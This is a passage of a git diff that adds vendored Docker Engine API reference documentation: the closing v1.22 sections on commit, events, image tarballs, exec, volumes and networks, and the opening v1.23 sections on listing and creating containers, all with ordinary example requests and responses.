200 OK + Content-Type: text/plain + + OK + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a new image from a container's changes + +`POST /commit` + +Create a new image from a container's changes + +**Example request**: + + POST /v1.22/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "date" + ], + "Mounts": [ + { + "Source": "/data", + "Destination": "/data", + "Mode": "ro,Z", + "RW": false + } + ], + "Labels": { + "key1": "value1", + "key2": "value2" + }, + "WorkingDir": "", + "NetworkDisabled": false, + "ExposedPorts": { + "22/tcp": {} + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + {"Id": "596069db4bf5"} + +**JSON parameters**: + +- **config** - the container's configuration + +**Query parameters**: + +- **container** – source container +- **repo** – repository +- **tag** – tag +- **comment** – commit message +- **author** – author (e.g., "John Hannibal Smith + <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>") +- **pause** – 1/True/true or 0/False/false, whether to pause the container before committing +- **changes** – Dockerfile instructions to apply while committing + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **500** – server error + +#### Monitor Docker's events + +`GET /events` + +Get container events from docker, in real time via streaming. + +Docker containers report the following events: + + attach, commit, copy, create, destroy, die, exec_create, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update + +Docker images report the following events: + + delete, import, pull, push, tag, untag + +Docker volumes report the following events: + + create, mount, unmount, destroy + +Docker networks report the following events: + + create, connect, disconnect, destroy + +**Example request**: + + GET /v1.22/events?since=1374067924 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + Server: Docker/1.10.0 (linux) + Date: Fri, 29 Apr 2016 15:18:06 GMT + Transfer-Encoding: chunked + + { + "status": "pull", + "id": "alpine:latest", + "Type": "image", + "Action": "pull", + "Actor": { + "ID": "alpine:latest", + "Attributes": { + "name": "alpine" + } + }, + "time": 1461943101, + "timeNano": 1461943101301854122 + } + { + "status": "create", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "create", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943101, + "timeNano": 1461943101381709551 + } + { + "status": "attach", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "attach", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943101, + "timeNano": 1461943101383858412 + } + { + "Type": "network", + "Action": "connect", + "Actor": { + "ID": "7dc8ac97d5d29ef6c31b6052f3938c1e8f2749abbd17d1bd1febf2608db1b474", + "Attributes": { + "container": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "name": "bridge", + "type": "bridge" + } + }, + "time": 1461943101, + "timeNano": 1461943101394865557 + } + { + "status": "start", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "start", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943101, + "timeNano": 1461943101607533796 + } + { + "status": "resize", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "resize", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "height": "46", + "image": "alpine", + "name": "my-container", + "width": "204" + } + }, + "time": 1461943101, + "timeNano": 1461943101610269268 + } + { + "status": "die", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "die", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "exitCode": "0", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943105, + "timeNano": 1461943105079144137 + } + { + "Type": "network", + "Action": "disconnect", + "Actor": { + "ID": "7dc8ac97d5d29ef6c31b6052f3938c1e8f2749abbd17d1bd1febf2608db1b474", + "Attributes": { + "container": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "name": "bridge", + "type": "bridge" + } + }, + "time": 1461943105, + "timeNano": 1461943105230860245 + } + { + "status": "destroy", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "destroy", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943105, + "timeNano": 1461943105338056026 + } + +**Query parameters**: + +- **since** – Timestamp. Show all events created since timestamp and then stream +- **until** – Timestamp. Show events created until given timestamp and stop streaming +- **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. Available filters: + - `container=`; -- container to filter + - `event=`; -- event to filter + - `image=`; -- image to filter + - `label=`; -- image and container label to filter + - `type=`; -- either `container` or `image` or `volume` or `network` + - `volume=`; -- volume to filter + - `network=`; -- network to filter + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images in a repository + +`GET /images/(name)/get` + +Get a tarball containing all images and metadata for the repository specified +by `name`. + +If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image +(and its parents) are returned. If `name` is an image ID, similarly only that +image (and its parents) are returned, but with the exclusion of the +'repositories' file in the tarball, as there were no image names referenced. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.22/images/ubuntu/get + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images + +`GET /images/get` + +Get a tarball containing all images and metadata for one or more repositories. + +For each value of the `names` parameter: if it is a specific name and tag (e.g. +`ubuntu:latest`), then only that image (and its parents) are returned; if it is +an image ID, similarly only that image (and its parents) are returned and there +would be no names referenced in the 'repositories' file for this image ID. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.22/images/get?names=myname%2Fmyapp%3Alatest&names=busybox + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Load a tarball with a set of images and tags into docker + +`POST /images/load` + +Load a set of images and tags into a Docker repository. +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + POST /v1.22/images/load + Content-Type: application/x-tar + + Tarball in body + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Image tarball format + +An image tarball contains one directory per image layer (named using its long ID), +each containing these files: + +- `VERSION`: currently `1.0` - the file format version +- `json`: detailed layer information, similar to `docker inspect layer_id` +- `layer.tar`: A tarfile containing the filesystem changes in this layer + +The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories +for storing attribute changes and deletions. + +If the tarball defines a repository, the tarball should also include a `repositories` file at +the root that contains a list of repository and tag names mapped to layer IDs. + +``` +{"hello-world": + {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"} +} +``` + +#### Exec Create + +`POST /containers/(id or name)/exec` + +Sets up an exec instance in a running container `id` + +**Example request**: + + POST /v1.22/containers/e90e34656806/exec HTTP/1.1 + Content-Type: application/json + + { + "AttachStdin": true, + "AttachStdout": true, + "AttachStderr": true, + "Cmd": ["sh"], + "DetachKeys": "ctrl-p,ctrl-q", + "Privileged": true, + "Tty": true, + "User": "123:456" + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id": "f90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command. +- **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command. +- **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command. +- **DetachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. +- **Tty** - Boolean value to allocate a pseudo-TTY. +- **Cmd** - Command to run specified as a string or an array of strings. +- **Privileged** - Boolean value, runs the exec process with extended privileges. +- **User** - A string value specifying the user, and optionally, group to run + the exec process inside the container. Format is one of: `"user"`, + `"user:group"`, `"uid"`, or `"uid:gid"`. + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **409** - container is paused +- **500** - server error + +#### Exec Start + +`POST /exec/(id)/start` + +Starts a previously set up `exec` instance `id`. If `detach` is true, this API +returns after starting the `exec` command. Otherwise, this API sets up an +interactive session with the `exec` command. + +**Example request**: + + POST /v1.22/exec/e90e34656806/start HTTP/1.1 + Content-Type: application/json + + { + "Detach": false, + "Tty": false + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/vnd.docker.raw-stream + + {% raw %} + {{ STREAM }} + {% endraw %} + +**JSON parameters**: + +- **Detach** - Detach from the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **409** - container is paused + +**Stream details**: + +Similar to the stream behavior of `POST /containers/(id or name)/attach` API + +#### Exec Resize + +`POST /exec/(id)/resize` + +Resizes the `tty` session used by the `exec` command `id`. The unit is number of characters. +This API is valid only if `tty` was specified as part of creating and starting the `exec` command. + +**Example request**: + + POST /v1.22/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1 + Content-Type: text/plain + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: text/plain + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **201** – no error +- **404** – no such exec instance + +#### Exec Inspect + +`GET /exec/(id)/json` + +Return low-level information about the `exec` command `id`. + +**Example request**: + + GET /v1.22/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "CanRemove": false, + "ContainerID": "b53ee82b53a40c7dca428523e34f741f3abc51d9f297a14ff874bf761b995126", + "DetachKeys": "", + "ExitCode": 2, + "ID": "f33bbfb39f5b142420f4759b2348913bd4a8d1a6d7fd56499cb41a1bb91d7b3b", + "OpenStderr": true, + "OpenStdin": true, + "OpenStdout": true, + "ProcessConfig": { + "arguments": [ + "-c", + "exit 2" + ], + "entrypoint": "sh", + "privileged": false, + "tty": true, + "user": "1000" + }, + "Running": false + } + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **500** - server error + +### 2.4 Volumes + +#### List volumes + +`GET /volumes` + +**Example request**: + + GET /v1.22/volumes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Volumes": [ + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis" + } + ], + "Warnings": [] + } + +**Query parameters**: + +- **filters** - JSON encoded value of the filters (a `map[string][]string`) to process on the volumes list. There is one available filter: `dangling=true` + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a volume + +`POST /volumes/create` + +Create a volume + +**Example request**: + + POST /v1.22/volumes/create HTTP/1.1 + Content-Type: application/json + + { + "Name": "tardis" + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis" + } + +**Status codes**: + +- **201** - no error +- **500** - server error + +**JSON parameters**: + +- **Name** - The new volume's name. If not specified, Docker generates a name. +- **Driver** - Name of the volume driver to use. Defaults to `local` for the name. +- **DriverOpts** - A mapping of driver options and values. These options are + passed directly to the driver and are driver specific. + +#### Inspect a volume + +`GET /volumes/(name)` + +Return low-level information on the volume `name` + +**Example request**: + + GET /volumes/tardis + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis" + } + +**Status codes**: + +- **200** - no error +- **404** - no such volume +- **500** - server error + +#### Remove a volume + +`DELETE /volumes/(name)` + +Instruct the driver to remove the volume (`name`). + +**Example request**: + + DELETE /v1.22/volumes/tardis HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** - no error +- **404** - no such volume or volume driver +- **409** - volume is in use and cannot be removed +- **500** - server error + +### 2.5 Networks + +#### List networks + +`GET /networks` + +**Example request**: + + GET /v1.22/networks?filters={"type":{"custom":true}} HTTP/1.1 + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +[ + { + "Name": "bridge", + "Id": "f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566", + "Scope": "local", + "Driver": "bridge", + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.17.0.0/16" + } + ] + }, + "Containers": { + "39b69226f9d79f5634485fb236a23b2fe4e96a0a94128390a7fbbcc167065867": { + "EndpointID": "ed2419a97c1d9954d05b46e462e7002ea552f216e9b136b80a7db8d98b442eda", + "MacAddress": "02:42:ac:11:00:02", + "IPv4Address": "172.17.0.2/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + } + }, + { + "Name": "none", + "Id": "e086a3893b05ab69242d3c44e49483a3bbbd3a26b46baa8f61ab797c1088d794", + "Scope": "local", + "Driver": "null", + "IPAM": { + "Driver": "default", + "Config": [] + }, + "Containers": {}, + "Options": {} + }, + { + "Name": "host", + "Id": "13e871235c677f196c4e1ecebb9dc733b9b2d2ab589e30c539efeda84a24215e", + "Scope": "local", + "Driver": "host", + "IPAM": { + "Driver": "default", + "Config": [] + }, + "Containers": {}, + "Options": {} + } +] +``` + +**Query parameters**: + +- **filters** - JSON encoded network list filter. The filter value is one of: + - `id=` Matches all or part of a network id. + - `name=` Matches all or part of a network name. + - `type=["custom"|"builtin"]` Filters networks by type. The `custom` keyword returns all user-defined networks. + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Inspect network + +`GET /networks/` + +**Example request**: + + GET /v1.22/networks/7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99 HTTP/1.1 + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +{ + "Name": "net01", + "Id": "7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99", + "Scope": "local", + "Driver": "bridge", + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.19.0.0/16", + "Gateway": "172.19.0.1/16" + } + ], + "Options": { + "foo": "bar" + } + }, + "Containers": { + "19a4d5d687db25203351ed79d478946f861258f018fe384f229f2efa4b23513c": { + "Name": "test", + "EndpointID": "628cadb8bcb92de107b2a1e516cbffe463e321f548feb37697cce00ad694f21a", + "MacAddress": "02:42:ac:13:00:02", + "IPv4Address": "172.19.0.2/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + } +} +``` + +**Status codes**: + +- **200** - no error +- **404** - network not found + +#### Create a network + +`POST /networks/create` + +Create a network + +**Example request**: + +``` +POST /v1.22/networks/create HTTP/1.1 +Content-Type: application/json + +{ + "Name":"isolated_nw", + "CheckDuplicate":true, + "Driver":"bridge", + "IPAM":{ + "Driver": "default", + "Config":[ + { + "Subnet":"172.20.0.0/16", + "IPRange":"172.20.10.0/24", + "Gateway":"172.20.10.11" + }, + { + "Subnet":"2001:db8:abcd::/64", + "Gateway":"2001:db8:abcd::1011" + } + ], + "Options": { + "foo": "bar" + } + }, + "Internal":true +} +``` + +**Example response**: + +``` +HTTP/1.1 201 Created +Content-Type: application/json + +{ + "Id": "22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30", + "Warning": "" +} +``` + +**Status codes**: + +- **201** - no error +- **404** - plugin not found +- **500** - server error + +**JSON parameters**: + +- **Name** - The new network's name. this is a mandatory field +- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false` +- **Driver** - Name of the network driver plugin to use. Defaults to `bridge` driver +- **IPAM** - Optional custom IP scheme for the network + - **Driver** - Name of the IPAM driver to use. Defaults to `default` driver + - **Config** - List of IPAM configuration options, specified as a map: + `{"Subnet": , "IPRange": , "Gateway": , "AuxAddress": }` + - **Options** - Driver-specific options, specified as a map: `{"option":"value" [,"option2":"value2"]}` +- **Options** - Network specific options to be used by the drivers + +#### Connect a container to a network + +`POST /networks/(id)/connect` + +Connect a container to a network + +**Example request**: + +``` +POST /v1.22/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/connect HTTP/1.1 +Content-Type: application/json + +{ + "Container":"3613f73ba0e4", + "EndpointConfig": { + "IPAMConfig": { + "IPv4Address":"172.24.56.89", + "IPv6Address":"2001:db8::5689" + } + } +} +``` + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **404** - network or container is not found +- **500** - Internal Server Error + +**JSON parameters**: + +- **container** - container-id/name to be connected to the network + +#### Disconnect a container from a network + +`POST /networks/(id)/disconnect` + +Disconnect a container from a network + +**Example request**: + +``` +POST /v1.22/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/disconnect HTTP/1.1 +Content-Type: application/json + +{ + "Container":"3613f73ba0e4", + "Force":false +} +``` + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **404** - network or container not found +- **500** - Internal Server Error + +**JSON parameters**: + +- **Container** - container-id/name to be disconnected from a network +- **Force** - Force the container to disconnect from a network + +#### Remove a network + +`DELETE /networks/(id)` + +Instruct the driver to remove the network (`id`). + +**Example request**: + + DELETE /v1.22/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **404** - no such network +- **500** - server error + +## 3. Going further + +### 3.1 Inside `docker run` + +As an example, the `docker run` command line makes the following API calls: + +- Create the container + +- If the status code is 404, it means the image doesn't exist: + - Try to pull it. + - Then, retry to create the container. + +- Start the container. + +- If you are not in detached mode: +- Attach to the container, using `logs=1` (to have `stdout` and + `stderr` from the container's start) and `stream=1` + +- If in detached mode or only `stdin` is attached, display the container's id. + +### 3.2 Hijacking + +In this version of the API, `/attach`, uses hijacking to transport `stdin`, +`stdout`, and `stderr` on the same socket. + +To hint potential proxies about connection hijacking, Docker client sends +connection upgrade headers similarly to websocket. + + Upgrade: tcp + Connection: Upgrade + +When Docker daemon detects the `Upgrade` header, it switches its status code +from **200 OK** to **101 UPGRADED** and resends the same headers. + + +### 3.3 CORS Requests + +To set cross origin requests to the Engine API please give values to +`--api-cors-header` when running Docker in daemon mode. Set * (asterisk) allows all, +default or blank means CORS disabled + + $ dockerd -H="192.168.1.9:2375" --api-cors-header="http://foo.bar" diff --git a/vendor/github.com/docker/docker/docs/api/v1.23.md b/vendor/github.com/docker/docker/docs/api/v1.23.md new file mode 100644 index 0000000000..e23811bb95 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/api/v1.23.md @@ -0,0 +1,3424 @@ +--- +title: "Engine API v1.23" +description: "API Documentation for Docker" +keywords: "API, Docker, rcli, REST, documentation" +redirect_from: +- /engine/reference/api/docker_remote_api_v1.23/ +- /reference/api/docker_remote_api_v1.23/ +--- + + + +## 1. Brief introduction + + - The daemon listens on `unix:///var/run/docker.sock` but you can + [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket). + - The API tends to be REST. However, for some complex commands, like `attach` + or `pull`, the HTTP connection is hijacked to transport `stdout`, + `stdin` and `stderr`. + - When the client API version is newer than the daemon's, these calls return an HTTP + `400 Bad Request` error message. + +## 2. Endpoints + +### 2.1 Containers + +#### List containers + +`GET /containers/json` + +List containers + +**Example request**: + + GET /v1.23/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "8dfafdbc3a40", + "Names":["/boring_feynman"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 1", + "Created": 1367854155, + "State": "Exited", + "Status": "Exit 0", + "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}], + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "SizeRw": 12288, + "SizeRootFs": 0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "2cdc4edb1ded3631c81f57966563e5c8525b81121bb3706a9a9a3ae102711f3f", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:02" + } + } + }, + "Mounts": [ + { + "Name": "fac362...80535", + "Source": "/data", + "Destination": "/data", + "Driver": "local", + "Mode": "ro,Z", + "RW": false, + "Propagation": "" + } + ] + }, + { + "Id": "9cd87474be90", + "Names":["/coolName"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 222222", + "Created": 1367854155, + "State": "Exited", + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "88eaed7b37b38c2a3f0c4bc796494fdf51b270c2d22656412a2ca5d559a64d7a", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.8", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:08" + } + } + }, + "Mounts": [] + }, + { + "Id": "3176a2479c92", + "Names":["/sleepy_dog"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 3333333333333333", + "Created": 1367854154, + "State": "Exited", + "Status": "Exit 0", + "Ports":[], + "Labels": {}, + "SizeRw":12288, + "SizeRootFs":0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "8b27c041c30326d59cd6e6f510d4f8d1d570a228466f956edf7815508f78e30d", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.6", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:06" + } + } + }, + "Mounts": [] + }, + { + "Id": "4cb07b47f9fb", + "Names":["/running_cat"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 444444444444444444444444444444444", + "Created": 1367854152, + "State": "Exited", + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "d91c7b2f0644403d7ef3095985ea0e2370325cd2332ff3a3225c4247328e66e9", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.5", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:05" + } + } + }, + "Mounts": [] + } + ] + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, Show all containers. + Only running containers are shown by default (i.e., this defaults to false) +- **limit** – Show `limit` last created + containers, include non-running ones. +- **since** – Show only containers created since Id, include + non-running ones. +- **before** – Show only containers created before Id, include + non-running ones. +- **size** – 1/True/true or 0/False/false, Show the containers + sizes +- **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. Available filters: + - `exited=`; -- containers with exit code of `` ; + - `status=`(`created`|`restarting`|`running`|`paused`|`exited`|`dead`) + - `label=key` or `label="key=value"` of a container label + - `isolation=`(`default`|`process`|`hyperv`) (Windows daemon only) + - `ancestor`=(`[:]`, `` or ``) + - `before`=(`` or ``) + - `since`=(`` or ``) + - `volume`=(`` or ``) + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **500** – server error + +#### Create a container + +`POST /containers/create` + +Create a container + +**Example request**: + + POST /v1.23/containers/create HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": [ + "FOO=bar", + "BAZ=quux" + ], + "Cmd": [ + "date" + ], + "Entrypoint": "", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": "12:34:56:78:9a:bc", + "ExposedPorts": { + "22/tcp": {} + }, + "StopSignal": "SIGTERM", + "HostConfig": { + "Binds": ["/tmp:/tmp"], + "Tmpfs": { "/run": "rw,noexec,nosuid,size=65536k" }, + "Links": ["redis3:redis"], + "Memory": 0, + "MemorySwap": 0, + "MemoryReservation": 0, + "KernelMemory": 0, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpuQuota": 50000, + "CpusetCpus": "0,1", + "CpusetMems": "0,1", + "BlkioWeight": 300, + "BlkioWeightDevice": [{}], + "BlkioDeviceReadBps": [{}], + "BlkioDeviceReadIOps": [{}], + "BlkioDeviceWriteBps": [{}], + "BlkioDeviceWriteIOps": [{}], + "MemorySwappiness": 60, + "OomKillDisable": false, + "OomScoreAdj": 500, + "PidMode": "", + "PidsLimit": -1, + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsOptions": [""], + "DnsSearch": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "GroupAdd": ["newgroup"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [], + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [], + "CgroupParent": "", + "VolumeDriver": "", + "ShmSize": 67108864 + }, + "NetworkingConfig": { + "EndpointsConfig": { + "isolated_nw" : { + "IPAMConfig": { + "IPv4Address":"172.20.30.33", + "IPv6Address":"2001:db8:abcd::3033" + }, + "Links":["container_1", "container_2"], + "Aliases":["server_x", "server_y"] + } + } + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id":"e90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **Hostname** - A string value containing the hostname to use for the + container. +- **Domainname** - A string value containing the domain name to use + for the container. +- **User** - A string value specifying the user inside the container. +- **AttachStdin** - Boolean value, attaches to `stdin`. +- **AttachStdout** - Boolean value, attaches to `stdout`. +- **AttachStderr** - Boolean value, attaches to `stderr`. +- **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed. +- **OpenStdin** - Boolean value, opens `stdin`, +- **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects. +- **Env** - A list of environment variables in the form of `["VAR=value", ...]` +- **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }` +- **Cmd** - Command to run specified as a string or an array of strings. +- **Entrypoint** - Set the entry point for the container as a string or an array + of strings. +- **Image** - A string specifying the image name to use for the container. +- 